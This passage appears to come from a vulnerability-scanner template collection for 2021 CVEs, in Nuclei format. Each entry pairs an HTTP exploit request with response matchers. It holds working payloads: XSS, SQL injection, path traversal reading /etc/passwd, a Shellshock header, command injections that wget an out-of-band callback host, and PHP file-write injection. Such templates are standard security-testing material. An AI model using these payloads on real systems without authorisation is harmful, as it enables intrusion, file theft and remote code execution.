Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\n","GET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1","contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')"],"condition":"and"}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication 